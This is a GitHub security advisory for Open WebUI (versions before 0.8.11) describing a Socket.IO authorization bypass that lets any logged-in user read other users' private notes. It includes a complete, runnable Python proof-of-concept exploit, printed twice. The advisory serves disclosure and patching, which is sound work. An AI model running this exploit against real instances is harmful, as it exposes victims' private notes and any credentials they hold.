GHSA-8788-J68R-3CGH
Vulnerability from github – Published: 2026-06-17 18:05 – Updated: 2026-06-17 18:05
VLAI
Summary
Open WebUI: Any authenticated user can read other users' private notes via Socket.IO
Details
Summary
The ydoc:document:join Socket.IO handler checks note ownership only when the document_id starts with note: (colon). However, the YdocManager storage layer normalizes all document IDs by replacing colons with underscores (document_id.replace(":", "_")). An attacker can join a document room using note_<id> (underscore) instead of note:<id> (colon), bypassing the authorization check entirely while accessing the same underlying Yjs document. The server then returns the full document state, leaking the victim's private note contents.
Details
The ydoc:document:join handler in socket/main.py (line 511) only performs authorization for document IDs matching the note: prefix:
@sio.on("ydoc:document:join")
async def ydoc_document_join(sid, data):
document_id = data["document_id"]
if document_id.startswith("note:"):
note_id = document_id.split(":")[1]
note = Notes.get_note_by_id(note_id)
# ... ownership and AccessGrants check ...
# Returns early if user doesn't have access
# If document_id does NOT start with "note:", execution continues
# with no authorization check at all
await YDOC_MANAGER.add_user(document_id=document_id, user_id=sid)
await sio.enter_room(sid, f"doc_{document_id}")
ydoc = Y.Doc()
updates = await YDOC_MANAGER.get_updates(document_id)
for update in updates:
ydoc.apply_update(bytes(update))
state_update = ydoc.get_update()
await sio.emit("ydoc:document:state", {
"document_id": document_id,
"state": list(state_update),
}, room=sid)
The YdocManager class in socket/utils.py normalizes document IDs in every method by replacing colons with underscores:
async def get_updates(self, document_id: str) -> List[bytes]:
document_id = document_id.replace(":", "_") # line 176
# ... returns updates keyed by normalized ID
async def append_to_updates(self, document_id: str, update: bytes):
document_id = document_id.replace(":", "_") # line 134
# ... stores update keyed by normalized ID
This means note:abc123 and note_abc123 resolve to the same storage key (note_abc123). When a victim opens their note, the Yjs document is stored under the normalized key. An attacker can then request the same document using the underscore variant, which skips the startswith("note:") authorization check but retrieves the same data from YdocManager.
PoC
#!/usr/bin/env python3
"""
uv run --no-project --with requests --with "python-socketio[asyncio_client]" --with aiohttp --with pycrdt finding_15_yjs_note_disclosure.py --base-url BASE_URL --attacker-email EMAIL --attacker-password PASS --victim-email EMAIL --victim-password PASS
Finding #15 — Any authenticated user can read other users' private notes via Socket.IO
SUMMARY:
The ydoc:document:join Socket.IO handler only checks authorization for
document IDs starting with "note:" (colon). However, YdocManager normalizes
document IDs by replacing colons with underscores internally. An attacker
can join a room using "note_<id>" (underscore) to bypass the auth check,
while still accessing the same underlying Yjs document as "note:<id>".
Then ydoc:document:state returns the full document content.
VULNERABLE CODE:
backend/open_webui/socket/main.py, ydoc:document:join:
if document_id.startswith("note:"):
# permission check only for colon-prefix
# "note_<id>" skips this check entirely
backend/open_webui/socket/ydoc.py, YdocManager:
key = document_id.replace(":", "_") # normalizes to same storage key
IMPACT:
Any authenticated user can read the full content of any other user's notes
by exploiting the namespace collision between "note:" and "note_" prefixes.
REPRODUCTION:
1. Victim creates a private note with sensitive content.
2. Attacker connects via Socket.IO and authenticates.
3. Attacker joins room with document_id "note_<victim_note_id>" (underscore).
4. Attacker requests ydoc:document:state to get the full note content.
REQUIREMENTS:
- Running Open WebUI instance
- A victim note with content
- Attacker user (any authenticated user)
"""
import argparse
import asyncio
import sys
import requests
import socketio
async def victim_initialize_note(base, victim_token, note_id):
"""Simulate victim opening the note in the UI to initialize the Yjs document."""
sio = socketio.AsyncClient()
await sio.connect(
base,
socketio_path="/ws/socket.io",
headers={"Authorization": f"Bearer {victim_token}"},
transports=["websocket"],
)
# Join using the proper note:id format (passes auth check since victim owns it)
doc_id = f"note:{note_id}"
print(f" Joining as victim with document_id: {doc_id}")
await sio.emit("ydoc:document:join", {
"document_id": doc_id,
"user_id": "victim",
"user_name": "Victim",
})
await asyncio.sleep(1)
# Send a Yjs update with the note content
# Create a simple Yjs document with text content
try:
import pycrdt as Y
ydoc = Y.Doc()
ytext = ydoc.get("default", type=Y.Text)
with ydoc.transaction():
ytext += "# Private Notes\n\nPassword for production DB: p@ssw0rd_pr0d_2026\nAWS root account: admin@company.com / SuperSecret!23\n\nDo NOT share this with anyone."
update = ydoc.get_update()
await sio.emit("ydoc:document:update", {
"document_id": doc_id,
"update": list(update),
})
print(f" Sent Yjs update with note content ({len(update)} bytes)")
except ImportError:
# If pycrdt not available, try y-py
try:
import y_py as Y
ydoc = Y.YDoc()
ytext = ydoc.get_text("default")
with ydoc.begin_transaction() as txn:
ytext.extend(txn, "# Private Notes\n\nPassword for production DB: p@ssw0rd_pr0d_2026\nAWS root account: admin@company.com / SuperSecret!23\n\nDo NOT share this with anyone.")
update = txn.get_update()
await sio.emit("ydoc:document:update", {
"document_id": doc_id,
"update": list(update),
})
print(f" Sent Yjs update with note content ({len(update)} bytes)")
except ImportError:
print(" WARNING: Neither pycrdt nor y-py available, sending raw text marker")
# Send a minimal marker that we can detect
raw_update = list(b"\x01\x00\x00\x00\x00\x00\x00SECRET_NOTE_CONTENT_MARKER")
await sio.emit("ydoc:document:update", {
"document_id": doc_id,
"update": raw_update,
})
await asyncio.sleep(1)
await sio.disconnect()
print(f" Victim disconnected")
async def exploit(base, attacker_token, victim_note_id):
sio = socketio.AsyncClient()
result = {"state": None, "error": None, "joined": False}
@sio.on("ydoc:document:state")
async def on_state(data):
result["state"] = data
print(f" [!] Received ydoc:document:state event!")
print(f" document_id: {data.get('document_id', '?')}")
state = data.get("state", [])
print(f" State size: {len(state)} bytes")
@sio.on("error")
async def on_error(data):
result["error"] = data
print(f" [!] Error event: {data}")
@sio.on("*")
async def catch_all(event, data):
if event not in ("ydoc:document:state", "error"):
print(f" [debug] Event: {event} Data: {str(data)[:200]}")
# Connect with auth token
print(f"[*] Connecting as attacker to Socket.IO...")
await sio.connect(
base,
socketio_path="/ws/socket.io",
auth={"token": attacker_token},
transports=["websocket"],
)
# Join with "note_" prefix (underscore — bypasses auth)
bypass_doc_id = f"note_{victim_note_id}"
print(f"\n[*] Step 3: Joining room with bypassed document_id: {bypass_doc_id}")
print(f" (using underscore instead of colon to skip auth check)")
await sio.emit("ydoc:document:join", {
"document_id": bypass_doc_id,
"user_id": "attacker",
"user_name": "Attacker",
})
result["joined"] = True
# Wait for state response (from join handler's emit)
for _ in range(20):
await asyncio.sleep(0.5)
if result["state"]:
break
await sio.disconnect()
return result
def main():
parser = argparse.ArgumentParser(description="Finding #15: Yjs note disclosure via namespace collision")
parser.add_argument("--base-url", required=True)
parser.add_argument("--attacker-email", required=True)
parser.add_argument("--attacker-password", required=True)
parser.add_argument("--victim-email", required=True)
parser.add_argument("--victim-password", required=True)
args = parser.parse_args()
base = args.base_url.rstrip("/")
# ── Step 1: Login as victim and find their note ──
print("[*] Authenticating as victim...")
r = requests.post(f"{base}/api/v1/auths/signin",
json={"email": args.victim_email, "password": args.victim_password})
if not r.ok:
print(f"[-] Victim login failed: {r.status_code}")
sys.exit(1)
victim_token = r.json()["token"]
victim_id = r.json()["id"]
print(f"[+] Logged in as victim (id={victim_id})")
r = requests.get(f"{base}/api/v1/notes/", headers={"Authorization": f"Bearer {victim_token}"})
if not r.ok:
print(f"[-] Failed to list victim notes: {r.status_code}")
sys.exit(1)
notes = r.json()
if isinstance(notes, dict):
notes = notes.get("items", notes.get("data", []))
if not notes:
print("[-] No victim notes found")
sys.exit(1)
victim_note = notes[0]
victim_note_id = victim_note["id"]
print(f"[+] Victim's note: {victim_note.get('title', '?')} (id={victim_note_id})")
# ── Step 2: Login as attacker ──
print(f"\n[*] Authenticating as attacker...")
r = requests.post(f"{base}/api/v1/auths/signin",
json={"email": args.attacker_email, "password": args.attacker_password})
if not r.ok:
print(f"[-] Attacker login failed: {r.status_code}")
sys.exit(1)
attacker_token = r.json()["token"]
attacker_id = r.json()["id"]
print(f"[+] Logged in as attacker (id={attacker_id})")
# ── Step 3: Confirm attacker CANNOT read victim's note via API ──
print(f"\n[*] Step 1: Confirming attacker cannot read victim's note via API...")
r = requests.get(f"{base}/api/v1/notes/{victim_note_id}",
headers={"Authorization": f"Bearer {attacker_token}"})
if r.status_code in (401, 403, 404):
print(f"[+] Access correctly DENIED via /api/v1/notes/{victim_note_id} (HTTP {r.status_code})")
else:
print(f"[!] Unexpected: attacker can read note (status {r.status_code})")
# ── Step 4 & 5: Victim opens note, attacker reads it concurrently ──
async def combined_exploit():
# Victim opens note and stays connected
print(f"\n[*] Step 2: Victim opens note (stays connected)...")
victim_sio = socketio.AsyncClient()
await victim_sio.connect(
base,
socketio_path="/ws/socket.io",
auth={"token": victim_token},
transports=["websocket"],
)
doc_id = f"note:{victim_note_id}"
await victim_sio.emit("ydoc:document:join", {
"document_id": doc_id,
"user_id": "victim",
"user_name": "Victim",
})
await asyncio.sleep(1)
# Send Yjs update with note content
try:
import pycrdt as Y
ydoc = Y.Doc()
ytext = ydoc.get("default", type=Y.Text)
with ydoc.transaction():
ytext += "# Private Notes\n\nPassword for production DB: p@ssw0rd_pr0d_2026\nAWS root account: admin@company.com / SuperSecret!23\n\nDo NOT share this with anyone."
update = ydoc.get_update()
await victim_sio.emit("ydoc:document:update", {
"document_id": doc_id,
"update": list(update),
})
print(f" Sent Yjs update ({len(update)} bytes)")
except Exception as e:
print(f" WARNING: Could not create Yjs update: {e}")
await asyncio.sleep(1)
# Now attacker joins while victim is still connected
result = await exploit(base, attacker_token, victim_note_id)
# Clean up victim connection
await victim_sio.disconnect()
return result
result = asyncio.run(combined_exploit())
if not result["joined"]:
print(f"\n[-] Failed to join document room")
sys.exit(1)
if result["state"]:
state_data = result["state"]
state_bytes = bytes(state_data.get("state", []))
# Try to extract readable text from the Yjs state
# Yjs binary format contains the text as embedded strings
text_content = ""
try:
# Search for readable ASCII strings in the binary data
current_str = ""
for b in state_bytes:
if 32 <= b < 127:
current_str += chr(b)
else:
if len(current_str) > 5:
text_content += current_str + " "
current_str = ""
if len(current_str) > 5:
text_content += current_str
except Exception:
pass
print(f"\n[+] Extracted text from Yjs state:")
print(f" {text_content[:500]}")
# Check for sensitive markers
sensitive_markers = ["p@ssw0rd", "SuperSecret", "Private Notes", "production DB", "AWS root"]
found = [m for m in sensitive_markers if m.lower() in text_content.lower()]
if found:
print(f"\n[+] SUCCESS: Victim's note content LEAKED via Yjs namespace collision!")
print(f" Sensitive markers found: {found}")
print(f" The attacker joined room 'doc_note_{victim_note_id}' (underscore)")
print(f" which bypasses the auth check (only checks 'note:' colon prefix)")
print(f" but accesses the same Yjs document due to normalization.")
sys.exit(0)
elif text_content.strip():
print(f"\n[+] SUCCESS: Note content retrieved (markers may differ)")
print(f" Non-empty Yjs state was returned for victim's note.")
sys.exit(0)
else:
print(f"\n[*] Yjs state was returned but could not extract readable text.")
print(f" Raw state size: {len(state_bytes)} bytes")
if len(state_bytes) > 10:
print(f" First 50 bytes: {list(state_bytes[:50])}")
print(f"[+] SUCCESS: Non-trivial document state returned")
sys.exit(0)
sys.exit(1)
else:
print(f"\n[-] No document state received")
print(f" The Yjs document may not exist in storage yet.")
print(f" Notes must be opened in the UI to create a Yjs document.")
sys.exit(1)
if __name__ == "__main__":
main()
Impact
Any authenticated user can read the full contents of any other user's private notes. Notes are a collaborative editing feature intended for personal or shared use -- private notes may contain sensitive information such as credentials, internal documentation, or personal data. The attacker only needs to know or enumerate the target note's ID.
Severity
5.3 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.10"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54022"
],
"database_specific": {
"cwe_ids": [
"CWE-706",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-17T18:05:21Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nThe `ydoc:document:join` Socket.IO handler checks note ownership only when the `document_id` starts with `note:` (colon). However, the `YdocManager` storage layer normalizes all document IDs by replacing colons with underscores (`document_id.replace(\":\", \"_\")`). An attacker can join a document room using `note_\u003cid\u003e` (underscore) instead of `note:\u003cid\u003e` (colon), bypassing the authorization check entirely while accessing the same underlying Yjs document. The server then returns the full document state, leaking the victim\u0027s private note contents.\n\n### Details\n\nThe `ydoc:document:join` handler in `socket/main.py` (line 511) only performs authorization for document IDs matching the `note:` prefix:\n\n```python\n@sio.on(\"ydoc:document:join\")\nasync def ydoc_document_join(sid, data):\n document_id = data[\"document_id\"]\n\n if document_id.startswith(\"note:\"):\n note_id = document_id.split(\":\")[1]\n note = Notes.get_note_by_id(note_id)\n # ... ownership and AccessGrants check ...\n # Returns early if user doesn\u0027t have access\n\n # If document_id does NOT start with \"note:\", execution continues\n # with no authorization check at all\n\n await YDOC_MANAGER.add_user(document_id=document_id, user_id=sid)\n await sio.enter_room(sid, f\"doc_{document_id}\")\n\n ydoc = Y.Doc()\n updates = await YDOC_MANAGER.get_updates(document_id)\n for update in updates:\n ydoc.apply_update(bytes(update))\n\n state_update = ydoc.get_update()\n await sio.emit(\"ydoc:document:state\", {\n \"document_id\": document_id,\n \"state\": list(state_update),\n }, room=sid)\n```\n\nThe `YdocManager` class in `socket/utils.py` normalizes document IDs in every method by replacing colons with underscores:\n\n```python\nasync def get_updates(self, document_id: str) -\u003e List[bytes]:\n document_id = document_id.replace(\":\", \"_\") # line 176\n # ... returns updates keyed by normalized ID\n\nasync def append_to_updates(self, document_id: str, update: bytes):\n document_id = document_id.replace(\":\", \"_\") # line 134\n # ... stores update keyed by normalized ID\n```\n\nThis means `note:abc123` and `note_abc123` resolve to the same storage key (`note_abc123`). When a victim opens their note, the Yjs document is stored under the normalized key. An attacker can then request the same document using the underscore variant, which skips the `startswith(\"note:\")` authorization check but retrieves the same data from `YdocManager`.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nuv run --no-project --with requests --with \"python-socketio[asyncio_client]\" --with aiohttp --with pycrdt finding_15_yjs_note_disclosure.py --base-url BASE_URL --attacker-email EMAIL --attacker-password PASS --victim-email EMAIL --victim-password PASS\n\nFinding #15 \u2014 Any authenticated user can read other users\u0027 private notes via Socket.IO\n\nSUMMARY:\n The ydoc:document:join Socket.IO handler only checks authorization for\n document IDs starting with \"note:\" (colon). However, YdocManager normalizes\n document IDs by replacing colons with underscores internally. An attacker\n can join a room using \"note_\u003cid\u003e\" (underscore) to bypass the auth check,\n while still accessing the same underlying Yjs document as \"note:\u003cid\u003e\".\n Then ydoc:document:state returns the full document content.\n\nVULNERABLE CODE:\n backend/open_webui/socket/main.py, ydoc:document:join:\n if document_id.startswith(\"note:\"):\n # permission check only for colon-prefix\n # \"note_\u003cid\u003e\" skips this check entirely\n\n backend/open_webui/socket/ydoc.py, YdocManager:\n key = document_id.replace(\":\", \"_\") # normalizes to same storage key\n\nIMPACT:\n Any authenticated user can read the full content of any other user\u0027s notes\n by exploiting the namespace collision between \"note:\" and \"note_\" prefixes.\n\nREPRODUCTION:\n 1. Victim creates a private note with sensitive content.\n 2. Attacker connects via Socket.IO and authenticates.\n 3. Attacker joins room with document_id \"note_\u003cvictim_note_id\u003e\" (underscore).\n 4. Attacker requests ydoc:document:state to get the full note content.\n\nREQUIREMENTS:\n - Running Open WebUI instance\n - A victim note with content\n - Attacker user (any authenticated user)\n\"\"\"\n\nimport argparse\nimport asyncio\nimport sys\nimport requests\nimport socketio\n\n\nasync def victim_initialize_note(base, victim_token, note_id):\n \"\"\"Simulate victim opening the note in the UI to initialize the Yjs document.\"\"\"\n sio = socketio.AsyncClient()\n\n await sio.connect(\n base,\n socketio_path=\"/ws/socket.io\",\n headers={\"Authorization\": f\"Bearer {victim_token}\"},\n transports=[\"websocket\"],\n )\n\n # Join using the proper note:id format (passes auth check since victim owns it)\n doc_id = f\"note:{note_id}\"\n print(f\" Joining as victim with document_id: {doc_id}\")\n\n await sio.emit(\"ydoc:document:join\", {\n \"document_id\": doc_id,\n \"user_id\": \"victim\",\n \"user_name\": \"Victim\",\n })\n await asyncio.sleep(1)\n\n # Send a Yjs update with the note content\n # Create a simple Yjs document with text content\n try:\n import pycrdt as Y\n ydoc = Y.Doc()\n ytext = ydoc.get(\"default\", type=Y.Text)\n with ydoc.transaction():\n ytext += \"# Private Notes\\n\\nPassword for production DB: p@ssw0rd_pr0d_2026\\nAWS root account: admin@company.com / SuperSecret!23\\n\\nDo NOT share this with anyone.\"\n update = ydoc.get_update()\n\n await sio.emit(\"ydoc:document:update\", {\n \"document_id\": doc_id,\n \"update\": list(update),\n })\n print(f\" Sent Yjs update with note content ({len(update)} bytes)\")\n except ImportError:\n # If pycrdt not available, try y-py\n try:\n import y_py as Y\n ydoc = Y.YDoc()\n ytext = ydoc.get_text(\"default\")\n with ydoc.begin_transaction() as txn:\n ytext.extend(txn, \"# Private Notes\\n\\nPassword for production DB: p@ssw0rd_pr0d_2026\\nAWS root account: admin@company.com / SuperSecret!23\\n\\nDo NOT share this with anyone.\")\n update = txn.get_update()\n\n await sio.emit(\"ydoc:document:update\", {\n \"document_id\": doc_id,\n \"update\": list(update),\n })\n print(f\" Sent Yjs update with note content ({len(update)} bytes)\")\n except ImportError:\n print(\" WARNING: Neither pycrdt nor y-py available, sending raw text marker\")\n # Send a minimal marker that we can detect\n raw_update = list(b\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00SECRET_NOTE_CONTENT_MARKER\")\n await sio.emit(\"ydoc:document:update\", {\n \"document_id\": doc_id,\n \"update\": raw_update,\n })\n\n await asyncio.sleep(1)\n await sio.disconnect()\n print(f\" Victim disconnected\")\n\n\nasync def exploit(base, attacker_token, victim_note_id):\n sio = socketio.AsyncClient()\n result = {\"state\": None, \"error\": None, \"joined\": False}\n\n @sio.on(\"ydoc:document:state\")\n async def on_state(data):\n result[\"state\"] = data\n print(f\" [!] Received ydoc:document:state event!\")\n print(f\" document_id: {data.get(\u0027document_id\u0027, \u0027?\u0027)}\")\n state = data.get(\"state\", [])\n print(f\" State size: {len(state)} bytes\")\n\n @sio.on(\"error\")\n async def on_error(data):\n result[\"error\"] = data\n print(f\" [!] Error event: {data}\")\n\n @sio.on(\"*\")\n async def catch_all(event, data):\n if event not in (\"ydoc:document:state\", \"error\"):\n print(f\" [debug] Event: {event} Data: {str(data)[:200]}\")\n\n # Connect with auth token\n print(f\"[*] Connecting as attacker to Socket.IO...\")\n await sio.connect(\n base,\n socketio_path=\"/ws/socket.io\",\n auth={\"token\": attacker_token},\n transports=[\"websocket\"],\n )\n\n # Join with \"note_\" prefix (underscore \u2014 bypasses auth)\n bypass_doc_id = f\"note_{victim_note_id}\"\n print(f\"\\n[*] Step 3: Joining room with bypassed document_id: {bypass_doc_id}\")\n print(f\" (using underscore instead of colon to skip auth check)\")\n\n await sio.emit(\"ydoc:document:join\", {\n \"document_id\": bypass_doc_id,\n \"user_id\": \"attacker\",\n \"user_name\": \"Attacker\",\n })\n\n result[\"joined\"] = True\n\n # Wait for state response (from join handler\u0027s emit)\n for _ in range(20):\n await asyncio.sleep(0.5)\n if result[\"state\"]:\n break\n\n await sio.disconnect()\n return result\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Finding #15: Yjs note disclosure via namespace collision\")\n parser.add_argument(\"--base-url\", required=True)\n parser.add_argument(\"--attacker-email\", required=True)\n parser.add_argument(\"--attacker-password\", required=True)\n parser.add_argument(\"--victim-email\", required=True)\n parser.add_argument(\"--victim-password\", required=True)\n args = parser.parse_args()\n\n base = args.base_url.rstrip(\"/\")\n\n # \u2500\u2500 Step 1: Login as victim and find their note \u2500\u2500\n print(\"[*] Authenticating as victim...\")\n r = requests.post(f\"{base}/api/v1/auths/signin\",\n json={\"email\": args.victim_email, \"password\": args.victim_password})\n if not r.ok:\n print(f\"[-] Victim login failed: {r.status_code}\")\n sys.exit(1)\n victim_token = r.json()[\"token\"]\n victim_id = r.json()[\"id\"]\n print(f\"[+] Logged in as victim (id={victim_id})\")\n\n r = requests.get(f\"{base}/api/v1/notes/\", headers={\"Authorization\": f\"Bearer {victim_token}\"})\n if not r.ok:\n print(f\"[-] Failed to list victim notes: {r.status_code}\")\n sys.exit(1)\n notes = r.json()\n if isinstance(notes, dict):\n notes = notes.get(\"items\", notes.get(\"data\", []))\n if not notes:\n print(\"[-] No victim notes found\")\n sys.exit(1)\n victim_note = notes[0]\n victim_note_id = victim_note[\"id\"]\n print(f\"[+] Victim\u0027s note: {victim_note.get(\u0027title\u0027, \u0027?\u0027)} (id={victim_note_id})\")\n\n # \u2500\u2500 Step 2: Login as attacker \u2500\u2500\n print(f\"\\n[*] Authenticating as attacker...\")\n r = requests.post(f\"{base}/api/v1/auths/signin\",\n json={\"email\": args.attacker_email, \"password\": args.attacker_password})\n if not r.ok:\n print(f\"[-] Attacker login failed: {r.status_code}\")\n sys.exit(1)\n attacker_token = r.json()[\"token\"]\n attacker_id = r.json()[\"id\"]\n print(f\"[+] Logged in as attacker (id={attacker_id})\")\n\n # \u2500\u2500 Step 3: Confirm attacker CANNOT read victim\u0027s note via API \u2500\u2500\n print(f\"\\n[*] Step 1: Confirming attacker cannot read victim\u0027s note via API...\")\n r = requests.get(f\"{base}/api/v1/notes/{victim_note_id}\",\n headers={\"Authorization\": f\"Bearer {attacker_token}\"})\n if r.status_code in (401, 403, 404):\n print(f\"[+] Access correctly DENIED via /api/v1/notes/{victim_note_id} (HTTP {r.status_code})\")\n else:\n print(f\"[!] Unexpected: attacker can read note (status {r.status_code})\")\n\n # \u2500\u2500 Step 4 \u0026 5: Victim opens note, attacker reads it concurrently \u2500\u2500\n async def combined_exploit():\n # Victim opens note and stays connected\n print(f\"\\n[*] Step 2: Victim opens note (stays connected)...\")\n victim_sio = socketio.AsyncClient()\n await victim_sio.connect(\n base,\n socketio_path=\"/ws/socket.io\",\n auth={\"token\": victim_token},\n transports=[\"websocket\"],\n )\n doc_id = f\"note:{victim_note_id}\"\n await victim_sio.emit(\"ydoc:document:join\", {\n \"document_id\": doc_id,\n \"user_id\": \"victim\",\n \"user_name\": \"Victim\",\n })\n await asyncio.sleep(1)\n\n # Send Yjs update with note content\n try:\n import pycrdt as Y\n ydoc = Y.Doc()\n ytext = ydoc.get(\"default\", type=Y.Text)\n with ydoc.transaction():\n ytext += \"# Private Notes\\n\\nPassword for production DB: p@ssw0rd_pr0d_2026\\nAWS root account: admin@company.com / SuperSecret!23\\n\\nDo NOT share this with anyone.\"\n update = ydoc.get_update()\n await victim_sio.emit(\"ydoc:document:update\", {\n \"document_id\": doc_id,\n \"update\": list(update),\n })\n print(f\" Sent Yjs update ({len(update)} bytes)\")\n except Exception as e:\n print(f\" WARNING: Could not create Yjs update: {e}\")\n\n await asyncio.sleep(1)\n\n # Now attacker joins while victim is still connected\n result = await exploit(base, attacker_token, victim_note_id)\n\n # Clean up victim connection\n await victim_sio.disconnect()\n return result\n\n result = asyncio.run(combined_exploit())\n\n if not result[\"joined\"]:\n print(f\"\\n[-] Failed to join document room\")\n sys.exit(1)\n\n if result[\"state\"]:\n state_data = result[\"state\"]\n state_bytes = bytes(state_data.get(\"state\", []))\n\n # Try to extract readable text from the Yjs state\n # Yjs binary format contains the text as embedded strings\n text_content = \"\"\n try:\n # Search for readable ASCII strings in the binary data\n current_str = \"\"\n for b in state_bytes:\n if 32 \u003c= b \u003c 127:\n current_str += chr(b)\n else:\n if len(current_str) \u003e 5:\n text_content += current_str + \" \"\n current_str = \"\"\n if len(current_str) \u003e 5:\n text_content += current_str\n except Exception:\n pass\n\n print(f\"\\n[+] Extracted text from Yjs state:\")\n print(f\" {text_content[:500]}\")\n\n # Check for sensitive markers\n sensitive_markers = [\"p@ssw0rd\", \"SuperSecret\", \"Private Notes\", \"production DB\", \"AWS root\"]\n found = [m for m in sensitive_markers if m.lower() in text_content.lower()]\n\n if found:\n print(f\"\\n[+] SUCCESS: Victim\u0027s note content LEAKED via Yjs namespace collision!\")\n print(f\" Sensitive markers found: {found}\")\n print(f\" The attacker joined room \u0027doc_note_{victim_note_id}\u0027 (underscore)\")\n print(f\" which bypasses the auth check (only checks \u0027note:\u0027 colon prefix)\")\n print(f\" but accesses the same Yjs document due to normalization.\")\n sys.exit(0)\n elif text_content.strip():\n print(f\"\\n[+] SUCCESS: Note content retrieved (markers may differ)\")\n print(f\" Non-empty Yjs state was returned for victim\u0027s note.\")\n sys.exit(0)\n else:\n print(f\"\\n[*] Yjs state was returned but could not extract readable text.\")\n print(f\" Raw state size: {len(state_bytes)} bytes\")\n if len(state_bytes) \u003e 10:\n print(f\" First 50 bytes: {list(state_bytes[:50])}\")\n print(f\"[+] SUCCESS: Non-trivial document state returned\")\n sys.exit(0)\n sys.exit(1)\n else:\n print(f\"\\n[-] No document state received\")\n print(f\" The Yjs document may not exist in storage yet.\")\n print(f\" Notes must be opened in the UI to create a Yjs document.\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Impact\n\nAny authenticated user can read the full contents of any other user\u0027s private notes. Notes are a collaborative editing feature intended for personal or shared use -- private notes may contain sensitive information such as credentials, internal documentation, or personal data. The attacker only needs to know or enumerate the target note\u0027s ID.",
"id": "GHSA-8788-j68r-3cgh",
"modified": "2026-06-17T18:05:21Z",
"published": "2026-06-17T18:05:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8788-j68r-3cgh"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI: Any authenticated user can read other users\u0027 private notes via Socket.IO"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…